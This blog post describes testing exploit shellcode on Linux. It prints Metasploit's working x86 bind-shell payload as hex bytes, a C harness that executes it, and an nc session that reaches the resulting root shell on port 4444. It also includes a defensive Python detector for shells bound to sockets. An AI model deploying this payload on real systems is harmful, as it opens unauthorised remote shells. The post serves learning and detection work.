Testing Shellcode For Functionality
I am still trying to exploit the program I have blogged about on several previous occasions. Unfortunately I have come to an impassable debugging point and I guess I am just going to have to let this one drop for now. Perhaps I'll pick up with another program some other time.
What I will leave you with is a way to be sure that your shellcode will properly operate on the system you are trying to exploit. I found this method while reviewing an introduction to shellcode written by Samy Al Bahra that I found through Wikipedia's shellcode article.
Basically, if you want to test that your shellcode will operate properly without testing it through the program you are going to exploit, place it in the buffer of the following program. This example shows some shellcode that will bind to port 4444 on a Linux box and wait for a connection.
BT test # cat test_shell.c
/*
 * linux/x86/shell_bind_tcp - 84 bytes
 * http://www.metasploit.com
 * Encoder: generic/none
 * LPORT=4444
 */
unsigned char buf[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80"
"\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
"\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80"
"\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";

/* Cast the buffer to a function pointer and call it: the shellcode runs
 * inside this process with no exploit involved, so a bind on LPORT proves
 * the payload itself works. Note that buf sits in a writable data section;
 * the system in this post let it execute, but a toolchain that enforces
 * W^X (NX) will segfault at shell() unless the buffer is placed in
 * executable memory. */
int main(void)
{
    int (*shell)(void) = (int (*)(void))buf;
    shell();
    return 0;
}
Compile and run this code. As this is a Linux system, I used lsof to check whether the program had actually bound to the port.
BT test # lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
dhcpcd 4235 root 4u IPv4 7186 UDP *:bootpc
X 11093 root 1u IPv6 12351 TCP *:x11 (LISTEN)
X 11093 root 3u IPv4 12352 TCP *:x11 (LISTEN)
test_shel 24043 root 3u IPv4 46059 TCP *:krb524 (LISTEN)
Just so that everybody is clear: the output of lsof reports that test_shell (shown as test_shel because lsof truncates the COMMAND column) is bound to the port labeled "krb524". This is port 4444 by another name; lsof resolved the number through the services definition file. Here is the relevant output from that file.
BT test # grep krb524 /etc/services
krb524 4444/tcp
krb524 4444/udp
# PROBLEM krb524 assigned the port,
The final test is to connect to the port opened up by the test_shell program. The lsof -i typed after nc connects is executed by the spawned shell, which is why sh and lsof now show file descriptors 0, 1 and 2 on the socket.
BT test # nc localhost 4444
lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
dhcpcd 4235 root 4u IPv4 7186 UDP *:bootpc
X 11093 root 1u IPv6 12351 TCP *:x11 (LISTEN)
X 11093 root 3u IPv4 12352 TCP *:x11 (LISTEN)
sh 24700 root 0u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
sh 24700 root 1u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
sh 24700 root 2u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
sh 24700 root 3u IPv4 46764 TCP *:krb524 (LISTEN)
sh 24700 root 4u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
nc 25740 root 3u IPv4 47960 TCP localhost:53365->localhost:krb524 (ESTABLISHED)
lsof 25749 root 0u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
lsof 25749 root 1u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
lsof 25749 root 2u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
Done.
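The second lsof listing above is the signature a defender looks for: a shell whose stdin, stdout and stderr are all the same TCP socket, plus a child (lsof) that inherited those descriptors. As an added example that is not part of the original post, this Python script parses lsof -i output in the layout shown above (the sample lines are constructed from the post's listing) and flags any process with fds 0-2 on network sockets, alongside a list of listening endpoints to compare against an allowlist of expected services.

```python
from collections import defaultdict

# Constructed sample in the layout of the post's `lsof -i` listing:
# COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME (SIZE is blank on that lsof).
# It is the state after `nc localhost 4444` connected and `lsof -i` was typed
# into the spawned shell.
SAMPLE_LSOF = """\
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
dhcpcd 4235 root 4u IPv4 7186 UDP *:bootpc
X 11093 root 1u IPv6 12351 TCP *:x11 (LISTEN)
X 11093 root 3u IPv4 12352 TCP *:x11 (LISTEN)
sh 24700 root 0u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
sh 24700 root 1u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
sh 24700 root 2u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
sh 24700 root 3u IPv4 46764 TCP *:krb524 (LISTEN)
sh 24700 root 4u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
nc 25740 root 3u IPv4 47960 TCP localhost:53365->localhost:krb524 (ESTABLISHED)
lsof 25749 root 0u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
lsof 25749 root 1u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
lsof 25749 root 2u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
"""

STD_FDS = {0, 1, 2}


def parse_lsof(text):
    """Parse `lsof -i` output into one dict per file descriptor.

    The SIZE/OFF column is blank in the post's output but present (e.g.
    '0t0') on newer lsof builds, so the protocol token (TCP/UDP) is located
    by search instead of by a fixed column index.
    """
    records = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 8 or f[0] == "COMMAND":
            continue
        proto_idx = next(
            (i for i, tok in enumerate(f) if i >= 6 and tok in ("TCP", "UDP")), None)
        fd = f[3].rstrip("rwu")          # '0u' -> '0'; lsof -i lists only socket fds
        if proto_idx is None or not fd.isdigit():
            continue
        state = f[proto_idx + 2].strip("()") if len(f) > proto_idx + 2 else ""
        records.append({
            "command": f[0], "pid": int(f[1]), "user": f[2], "fd": int(fd),
            "proto": f[proto_idx], "name": f[proto_idx + 1], "state": state,
        })
    return records


def find_shell_over_socket(records):
    """Flag every process whose stdin, stdout and stderr are all sockets.

    A legitimate network service keeps fds 0-2 on a tty or /dev/null; a
    bind or reverse shell dup2()s its socket onto them so the shell's I/O
    travels over the connection. Children of that shell (the lsof in the
    post) inherit the same fds, so the whole process tree lights up.
    """
    by_pid = defaultdict(dict)
    for r in records:
        by_pid[r["pid"]][r["fd"]] = r
    hits = []
    for pid, fds in by_pid.items():
        if STD_FDS <= set(fds):
            hits.append({
                "pid": pid,
                "command": fds[0]["command"],
                "user": fds[0]["user"],
                "endpoint": fds[0]["name"],
                "also_listening": sorted(
                    r["name"] for r in fds.values() if r["state"] == "LISTEN"),
            })
    return hits


def listening_endpoints(records):
    """(command, endpoint) pairs in LISTEN state, to diff against an allowlist."""
    return sorted({(r["command"], r["name"]) for r in records if r["state"] == "LISTEN"})


if __name__ == "__main__":
    recs = parse_lsof(SAMPLE_LSOF)
    for h in find_shell_over_socket(recs):
        print(f"pid {h['pid']} ({h['command']}, {h['user']}): fds 0-2 on {h['endpoint']}; "
              f"listening on {h['also_listening'] or 'nothing'}")
    print("listening:", listening_endpoints(recs))
```

On a live box, feed it the output of lsof -nP -i instead of the sample: -P keeps port numbers numeric, which sidesteps the krb524 naming confusion above, and -n skips reverse DNS so the scan is fast. The fd 0-2 check is the durable part; the process name is not, since the shell can be renamed or a different binary can be dup2()'d onto the socket.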
I hope that all of this has been informative. Normally I would not stop until I have gotten this exercise to work but, for now, I am going to have to set this one off to the side. Mostly because I need to work on some other things right now but also because I have reached the limits of my debugging knowledge.
Go forth and do good things,
Cutaway